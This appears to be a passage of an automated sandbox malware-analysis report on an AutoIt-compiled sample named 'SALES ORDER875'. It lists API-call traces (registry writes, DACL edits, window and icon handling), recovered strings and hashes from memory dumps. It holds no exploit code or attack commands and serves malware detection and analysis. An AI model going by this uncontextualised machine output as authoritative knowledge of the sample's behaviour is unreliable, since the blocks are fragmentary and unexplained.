                                                                                                                                                                                    • Instruction ID: 36a7d7e8111fb262abb4ff1eed3b086071fdc39aabefa74b47847510dc08ed38
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0e5133816ff5e6a92b4a95a73ae904ad0b17a6ca6e22ac17085881276490fe6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1B18C71604341AFD700DF64C884BABFBE4FF89750F008959FA999B2A1C735E884CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00398968
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00398970
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0039899B
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 003989A3
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 003989C8
                                                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003989E5
                                                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003989F5
                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00398A28
                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00398A3C
                                                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00398A5A
                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00398A76
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00398A81
                                                                                                                                                                                      • Part of subcall function 0039912D: GetCursorPos.USER32(?), ref: 00399141
                                                                                                                                                                                      • Part of subcall function 0039912D: ScreenToClient.USER32(00000000,?), ref: 0039915E
                                                                                                                                                                                      • Part of subcall function 0039912D: GetAsyncKeyState.USER32(00000001), ref: 00399183
                                                                                                                                                                                      • Part of subcall function 0039912D: GetAsyncKeyState.USER32(00000002), ref: 0039919D
                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,003990FC), ref: 00398AA8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                                                    • Opcode ID: 8cabfa607186cac2124303bdb8b4fa02a8bae3f19187ca0f42a3f619beeb93f9
                                                                                                                                                                                    • Instruction ID: 4e9ad633e0e47039ec618872448e167ee03e6e311616fd569826d383b7d1da16
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cabfa607186cac2124303bdb8b4fa02a8bae3f19187ca0f42a3f619beeb93f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17B16F72A40209AFDF15DF68DC85BEE3BB5FB48315F11412AFA15AB2A0DB74E840CB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1114
                                                                                                                                                                                      • Part of subcall function 003E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E1120
                                                                                                                                                                                      • Part of subcall function 003E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E112F
                                                                                                                                                                                      • Part of subcall function 003E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E1136
                                                                                                                                                                                      • Part of subcall function 003E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E114D
                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003E0DF5
                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003E0E29
                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 003E0E40
                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 003E0E7A
                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003E0E96
                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 003E0EAD
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 003E0EB5
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 003E0EBC
                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003E0EDD
                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 003E0EE4
                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003E0F13
                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003E0F35
                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003E0F47
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E0F6E
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E0F75
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E0F7E
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E0F85
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E0F8E
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E0F95
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003E0FA1
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E0FA8
                                                                                                                                                                                      • Part of subcall function 003E1193: GetProcessHeap.KERNEL32(00000008,003E0BB1,?,00000000,?,003E0BB1,?), ref: 003E11A1
                                                                                                                                                                                      • Part of subcall function 003E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,003E0BB1,?), ref: 003E11A8
                                                                                                                                                                                      • Part of subcall function 003E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,003E0BB1,?), ref: 003E11B7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                    • Opcode ID: 742fa24dd0dd6be60c2fc21785d3a461740534288d0dd322e42b3735309f840d
                                                                                                                                                                                    • Instruction ID: 061b9273667baf4016e02f6446a7ba7c8ec276ec92c6f4e56e102ded07778461
                                                                                                                                                                                    • Opcode Fuzzy Hash: 742fa24dd0dd6be60c2fc21785d3a461740534288d0dd322e42b3735309f840d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E71AC7294025AABDF21DFA5DC84FEEBBB8BF08300F058225F919E6191D7709E55CB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C4BD
                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0041CC08,00000000,?,00000000,?,?), ref: 0040C544
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0040C5A4
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040C5F4
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040C66F
                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0040C6B2
                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0040C7C1
                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0040C84D
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040C881
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C88E
                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0040C960
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                                                                                    • Opcode ID: 911fe4b157f07974819cb9ee666d4e2b6c049a92569bf7d23a1b585a81c9b2bd
                                                                                                                                                                                    • Instruction ID: 1d8cec81b2ea3d52e59846cbad14dda9a748116f0b693493cdae9566b4ba8a3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 911fe4b157f07974819cb9ee666d4e2b6c049a92569bf7d23a1b585a81c9b2bd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C127735204201DFD715EF14C881A2AB7E5FF89714F1489ADF89AAB3A2DB35EC01CB95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 004109C6
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00410A01
                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00410A54
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00410A8A
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00410B06
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00410B81
                                                                                                                                                                                      • Part of subcall function 0039F9F2: _wcslen.LIBCMT ref: 0039F9FD
                                                                                                                                                                                      • Part of subcall function 003E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003E2BFA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                                                                                    • Opcode ID: 3620be92756d7680e2d8fa24b95df6c480d1ead04d07a12d4a0cd53c835f88c5
                                                                                                                                                                                    • Instruction ID: 3784ecfb85b8833bb23525839b27e72a50403be223b94d14df7f26dd51011455
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3620be92756d7680e2d8fa24b95df6c480d1ead04d07a12d4a0cd53c835f88c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17E1CF312083418FC714EF24C45096BB7E1FF98354B14899EF8969B3A2D778ED86CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                    • API String ID: 1256254125-909552448
                                                                                                                                                                                    • Opcode ID: 615b76c33d817b93ecd8621eb80407da090959ca4010bd691e1a325159b51242
                                                                                                                                                                                    • Instruction ID: ed6e7723f9a7bec3768f3c9507575c48f91e02a856ddc581a252c4a384cf26bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 615b76c33d817b93ecd8621eb80407da090959ca4010bd691e1a325159b51242
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4671E33260412ACBDB10DF68D8816BB33A19BA1750B25473AFC56BB3C4E73CDD4587A8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0041835A
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0041836E
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00418391
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 004183B4
                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004183F2
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0041361A,?), ref: 0041844E
                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00418487
                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004184CA
                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00418501
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0041850D
                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0041851D
                                                                                                                                                                                    • DestroyIcon.USER32(?), ref: 0041852C
                                                                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00418549
                                                                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00418555
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                                                                                    • Opcode ID: c04fdde32a30a0bd32ef3211ed36d2a4b5a6176b3c8cad42bcf4aef0d43c6a68
                                                                                                                                                                                    • Instruction ID: 00a88cee7556130e153a7e240317b463c49f7b81265b21438e4092d9a15664da
                                                                                                                                                                                    • Opcode Fuzzy Hash: c04fdde32a30a0bd32ef3211ed36d2a4b5a6176b3c8cad42bcf4aef0d43c6a68
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3961CF71540219BAEB15DF64CC81BFF77A8FB04B11F10861AF815DA1D1EFB8A990CBA4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                    • API String ID: 0-1645009161
                                                                                                                                                                                    • Opcode ID: 2cfdb69836cfdf25cfea6d85e85535246a4828704d35b3c9f20c1ce0a1827f94
                                                                                                                                                                                    • Instruction ID: 88ed4873501e939ddf3308b6c3e348216826dbb02be9030b3837f4e2bb51e4aa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cfdb69836cfdf25cfea6d85e85535246a4828704d35b3c9f20c1ce0a1827f94
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F810171A44305ABDB23BF60CC42FBE77A9AF15300F254065F805AE196EB75ED41C7A1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 003E5A2E
                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003E5A40
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 003E5A57
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 003E5A6C
                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 003E5A72
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 003E5A82
                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 003E5A88
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003E5AA9
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003E5AC3
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003E5ACC
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003E5B33
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 003E5B6F
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 003E5B75
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003E5B7C
                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 003E5BD3
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 003E5BE0
                                                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 003E5C05
                                                                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003E5C2F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 895679908-0
                                                                                                                                                                                    • Opcode ID: 0776c3890f1c284c8f51a134d46af8422a5d51013087e962cce4b4e071d20323
                                                                                                                                                                                    • Instruction ID: 86a5826de94108ef61c5b4395f766a78a7928c68f4e4327668d7e578928a05fb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0776c3890f1c284c8f51a134d46af8422a5d51013087e962cce4b4e071d20323
                                                                                                                                                                                    • Instruction Fuzzy Hash: E9718131900B5A9FDB21DFA9CE85BAEBBF5FF48708F104628E142A65E0D774E940CB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[D
                                                                                                                                                                                    • API String ID: 176396367-2442121975
                                                                                                                                                                                    • Opcode ID: 94daffdb7b852af9f0380ad7c9d57452b7a29c78b1d6c880d987f285c4c0e7d3
                                                                                                                                                                                    • Instruction ID: 56db35c7b25fdf734bf0ed7639b20ea385395d33b70357fa4b6f41c1f8f93e50
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94daffdb7b852af9f0380ad7c9d57452b7a29c78b1d6c880d987f285c4c0e7d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE1E631A00566ABCF169F66C445BEEBBB4FF44710F55832AE456F72C0DB30AE458B90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003A00C6
                                                                                                                                                                                      • Part of subcall function 003A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0045070C,00000FA0,795668FE,?,?,?,?,003C23B3,000000FF), ref: 003A011C
                                                                                                                                                                                      • Part of subcall function 003A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003C23B3,000000FF), ref: 003A0127
                                                                                                                                                                                      • Part of subcall function 003A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003C23B3,000000FF), ref: 003A0138
                                                                                                                                                                                      • Part of subcall function 003A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003A014E
                                                                                                                                                                                      • Part of subcall function 003A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003A015C
                                                                                                                                                                                      • Part of subcall function 003A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003A016A
                                                                                                                                                                                      • Part of subcall function 003A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003A0195
                                                                                                                                                                                      • Part of subcall function 003A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003A01A0
                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 003A00E7
                                                                                                                                                                                      • Part of subcall function 003A00A3: __onexit.LIBCMT ref: 003A00A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • InitializeConditionVariable, xrefs: 003A0148
                                                                                                                                                                                    • kernel32.dll, xrefs: 003A0133
                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003A0122
                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 003A0154
                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 003A0162
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
